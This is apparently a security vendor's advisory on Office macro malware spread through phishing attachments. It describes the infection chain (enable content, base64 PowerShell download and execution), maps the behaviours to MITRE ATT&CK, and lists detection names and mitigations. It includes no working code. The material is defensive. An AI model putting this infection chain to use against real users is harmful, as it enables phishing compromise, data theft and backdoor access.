Summary
Macro is a set of commands that automates a software to perform a certain action. Threat actors took advantage of this and came up with Macro Malwares. This form of malware is known for being abusive of the VBA (Visual Basic for Application) programming in Microsoft Office macros to spread other forms of malware. These are often delivered through phishing emails, wherein the attacker lures the recipient to open the attached document. Once opened, security warning will show on the page and the document will instruct the recipient to “Enable Content”. After that, the macro will run and the recipient is affected.
What the malicious macro typically does upon enabling is that it executes a base64 PowerShell code which will download a file in %UserProfile% or in %Temp%. This downloaded file will run soon afterwards.
Infection Chain:
Behaviors:
- Delivers other malware payloads
- Uses macro
- Steals computer data, computer name, system local, operating system (OS) version and running processes
Impact:
- Compromised system security, with backdoor capabilities that can execute malicious commands
Sample Spam (Invoice Attachment)
Sample Document - "Enable Content"
- MS Word
- MS Excel
Sample Macro
- MS Word
- MS Excel
MITRE ATT&CK Matrix
| BEHAVIOR | TACTIC | TECHNIQUE |
|---|
| Malware arrives as an attachment | Initial Access | T1566.001 Phishing: Spearphishing Attachment |
| Victim is lured into opening the attachment | Execution | T1204.002 User Execution: Malicious File |
| Downloaded document has obfuscated macros to hide URLs hosting the malware | Defense Evasion | T1027 Obfuscated Files or Information |
| Macro-enabled document will download and execute payload using powershell command | Execution | T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell |
Available Solutions:
| Solution Modules | Solution Available | Pattern Branch | Release Date | Detection/Policy/Rules |
|---|
| Email Protection | Yes | AS Pattern 5630 | August 28, 2020 | - |
| URL Protection | Yes | In the Cloud | - | - |
| Advanced Threat Scan Engine (ATSE) | Yes | 16.191.00 | August 28, 2020 | - |
| Predictive Learning (TrendX) | Yes | In the Cloud | - | Downloader.VBA.TRX.XXVBAF01FF009 |
| File detection (VSAPI) | Yes | ENT OPR 16.191.00 | August 28, 2020 | Trojan.W97M.EMOTET.TIOIBEKL
Trojan.W97M.EMOTET.TIOIBEKN
Trojan.W97M.ICEDID.AL
Trojan.W97M.POWLOAD.EMI
Trojan.W97M.POWLOAD.EMJ
Trojan.W97M.POWLOAD.TIOIBEMH
Trojan.W97M.POWLOAD.TIOIBEMN
Trojan.W97M.TRICKBOT.OD
Trojan.X97M.POWLOAD.USMANFOGEK
Trojan.X97M.POWLOAD.USNA |
| Behavioral Monitoring (AEGIS) | Yes | TMTD OPR 2163 | August 27, 2020 | 4560T |
Additional Threat Information Reference:
Recommendations:
- Always enable/use macro security function on Microsoft Word and Excel.
- Be extremely cautious about enabling macros. If there is any doubt about the authenticity of an email urging you to download a Word or Excel document, forward the contents to a member of the IT staff.
- If you continuously receive email attachments with macro from spam campaigns, you may utilize IMSVA’s macro scanning.
